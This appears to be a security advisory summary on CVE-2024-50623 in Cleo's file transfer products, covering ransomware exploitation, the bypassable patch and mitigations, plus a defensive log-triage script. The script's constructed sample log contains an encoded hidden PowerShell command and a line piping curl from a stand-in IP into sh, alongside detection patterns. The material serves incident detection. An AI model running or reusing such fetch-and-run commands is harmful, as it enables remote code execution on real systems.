Introduction

A critical zero-day vulnerability, CVE-2024-50623 [1] [2] [3] [4] [5] [6] [7] [8], has been identified in Cleo's managed file transfer products Harmony, VLTrader and LexiCom in versions prior to 5.8.0.21 [2] [4] [8]. The flaw allows unauthenticated remote code execution and has already been exploited in the wild, including by actors linked to the Termite ransomware group [2] [4]. Cleo's initial fix did not close the hole: the patched version remains exploitable [1] [2] [4] [5] [6] [7], so affected organizations need to mitigate rather than rely on the upgrade alone.

Description

Security researchers have identified a critical zero-day vulnerability, CVE-2024-50623 [1] [2] [3] [4] [5] [6] [7] [8], in Cleo's file transfer software, affecting the Harmony, VLTrader and LexiCom products prior to version 5.8.0.21 [2] [4] [6] [8]. The flaw permits unrestricted file uploads and downloads [8], which an unauthenticated attacker can turn into remote code execution (RCE); this puts enterprises that rely on Cleo's software for secure file transfer at severe risk [4]. The CVE was published on October 30, 2024 [4] and was initially categorized as cross-site scripting (CWE-79), but it has since been reclassified as an unrestricted file upload vulnerability (CWE-434) [5]. In-the-wild exploitation began on December 3, 2024, followed shortly by a sharp rise in attack volume, including activity attributed to the Termite ransomware group, which has claimed at least 10 victims across sectors such as consumer products, trucking, shipping and food [2] [6] [8]. Huntress reports mass exploitation of both unpatched and fully patched instances, so a current version number is not evidence that a server is safe [4].

Cleo published a security advisory on October 24 recommending that customers upgrade to version 5.8.0.21 [6]. Huntress has since shown that this version, and every version up to and including 5.8.0.23, is still vulnerable [5]: the patch introduced a validatePath function, but it does not cover all attack paths and can be bypassed. Researchers developed a proof-of-concept exploit and shared it with Cleo, which confirmed the issue [3]; the company is preparing a new CVE designation and working on a comprehensive patch. Cleo has acknowledged the severity of the flaw, stating that it could allow unauthenticated users to execute arbitrary bash or PowerShell commands on affected systems [5].

Reports indicate that at least 24 businesses across various industries have been targeted, and over 1,700 vulnerable Cleo servers have been detected, primarily in the US [4] [7] [8]. Censys counted 1,342 exposed instances of Harmony, VLTrader and LexiCom online, nearly 80% of them in the US [3] [8]. The potential blast radius is larger still, as Cleo serves over 4,200 customers, including Illumina, New Balance and Portable [7]. As mitigation, Huntress advises customers to remove affected products from public access and place them behind a firewall [3] [5] [6], to disable Cleo's Autorun Directory so that files written there are no longer executed automatically, and to monitor the installation directory for suspicious files, such as unexpected XML files, and the logs for unauthorized file imports or PowerShell execution.

Affected customers are urged to investigate their environments for suspicious activity dating back to at least December 3, 2024 [6]; Rapid7 has released detection rules for related activity [5], and network indicators of compromise (IOCs) for the exploitation, including specific IP addresses, are listed in its advisory [5]. The incident is the latest in a run of attacks on managed file transfer (MFT) tools, with attackers increasingly targeting enterprise software that handles sensitive data transfers [4]. Organizations using Cleo's products must apply the mitigations and remain vigilant while awaiting a comprehensive patch [4]. Cleo has indicated that a new patch is forthcoming [1]; until then, disabling the autoruns feature reduces the attack surface, but it does not remove the underlying arbitrary file-write vulnerability [1], so an exposed instance should still be treated as at risk.
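The file-system and log checks recommended above can be scripted so they run the same way on every Cleo host. The following is an added example written for this page, not Cleo's, Huntress's or Rapid7's code: it lists recently modified XML/TXT files under the Autorun and hosts directories of an install tree and scans log lines for PowerShell or bash execution and unexpected file imports. The directory names (`autorun`, `hosts`), the file names and the log-line format are assumptions; the sample log and install tree are constructed, and 203.0.113.10 is a documentation address, not a real IOC.

```python
"""Triage helper for a Cleo Harmony / VLTrader / LexiCom install directory.

Added example for this page, not Cleo's, Huntress's or Rapid7's code. It
scripts the two manual checks in the reporting: list recently written files in
the Autorun and hosts directories, and grep the logs for PowerShell or bash
execution and unexpected file imports. Directory names, file names and the
log-line format are assumptions, not documented Cleo behaviour.
"""
import os
import re
import tempfile
import time
from pathlib import Path

# Exploitation is reported to have started on 2024-12-03; look back at least that far.
LOOKBACK_START = time.mktime((2024, 12, 3, 0, 0, 0, 0, 0, -1))

# Assumed sub-directories of the install tree where dropped files would land.
WATCHED_SUBDIRS = ("autorun", "hosts")
WATCHED_SUFFIXES = {".xml", ".txt"}

# Generic (not Cleo-specific) log patterns; one line may trigger several.
LOG_PATTERNS = {
    "powershell_exec": re.compile(r"\bpowershell(?:\.exe)?\b", re.I),
    "shell_exec": re.compile(r"\b(?:bash|sh|cmd(?:\.exe)?)\b\s+(?:-c|/c)\s", re.I),
    "file_import": re.compile(r"\bimport\w*\b.*?\.(?:xml|txt)\b", re.I),
}


def suspicious_files(install_dir, since=LOOKBACK_START):
    """Return sorted (relative path, mtime) pairs for watched files modified at or after `since`."""
    root = Path(install_dir)
    hits = []
    for sub in WATCHED_SUBDIRS:
        folder = root / sub
        if not folder.is_dir():
            continue
        for path in folder.rglob("*"):
            if path.is_file() and path.suffix.lower() in WATCHED_SUFFIXES:
                mtime = path.stat().st_mtime
                if mtime >= since:
                    hits.append((path.relative_to(root).as_posix(), mtime))
    return sorted(hits)


def scan_log_lines(lines):
    """Return (line number, pattern name, stripped line) for every pattern hit, in log order."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in LOG_PATTERNS.items():
            if pattern.search(line):
                findings.append((number, name, line.strip()))
    return findings


# Constructed sample log, not real Cleo output; 203.0.113.10 is a documentation address.
SAMPLE_LOG = """\
2024-12-01 09:12:44 INFO  Connected to partner ftp.example.net
2024-12-04 03:17:02 INFO  Autorun: importing host file main.xml
2024-12-04 03:17:05 INFO  Run cmd /c powershell.exe -nop -w hidden -EncodedCommand aQBlAHgA
2024-12-04 03:18:11 INFO  Run /bin/bash -c "curl -s http://203.0.113.10/x | sh"
2024-12-05 08:00:00 INFO  Scheduled transfer completed
"""


def make_sample_install():
    """Build a throwaway install tree (constructed): one fresh and one stale autorun file,
    plus a config file outside the watched directories that must not be reported."""
    root = Path(tempfile.mkdtemp(prefix="cleo-triage-"))
    fresh = root / "autorun" / "update.xml"
    stale = root / "autorun" / "legacy.xml"
    other = root / "conf" / "settings.xml"
    for path in (fresh, stale, other):
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("<Host/>")
    old = LOOKBACK_START - 30 * 86400          # well before the exploitation window
    os.utime(stale, (old, old))
    return root


if __name__ == "__main__":
    root = make_sample_install()
    for rel, mtime in suspicious_files(root):
        print("file:", rel, time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(mtime)))
    for number, name, line in scan_log_lines(SAMPLE_LOG.splitlines()):
        print(f"log line {number}: {name}: {line}")
```

On a real host, point `suspicious_files` at the Cleo install root and feed `scan_log_lines` the product's log files; a hit is a lead, not a verdict, so pair any finding with the network IOCs from the Rapid7 advisory and with a check of whether the Autorun Directory was still enabled at the time of the entry.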

Conclusion

CVE-2024-50623 exposes Cleo Harmony, VLTrader and LexiCom to unauthenticated remote code execution, and the first patch did not close it: the vulnerability remains exploitable in patched builds [2], so affected organizations need to act now rather than wait for the upgrade alone to protect them. Companies should remove affected products from public access, disable the autoruns feature and hunt for suspicious activity going back to early December. The incident is another reminder that managed file transfer tools are a favoured target and that the data transfer processes they handle need robust protection. Cleo is working on a comprehensive patch; until it ships, organizations must take proactive steps to safeguard their systems.

References

[1] https://labs.watchtowr.com/cleo-cve-2024-50623/
[2] https://www.darkreading.com/cyberattacks-data-breaches/termite-ransomware-behind-cleo-zero-day-attacks
[3] https://www.csoonline.com/article/3621746/attackers-exploit-zero-day-rce-flaw-in-cleo-managed-file-transfer.html
[4] https://cybersecuritynews.com/cleo-zero-day-rce-vulnerability/
[5] https://www.rapid7.com/blog/post/2024/12/10/etr-widespread-exploitation-of-cleo-file-transfer-software-cve-2024-50623/
[6] https://www.infosecurity-magazine.com/news/zero-day-cleo-file-transfer/
[7] https://techcrunch.com/2024/12/10/hackers-are-exploiting-a-flaw-in-popular-file-transfer-tools-to-launch-mass-hacks-again/
[8] https://www.cybersecuritydive.com/news/flaw-cleo-file-transfer-software-exploitation/735191/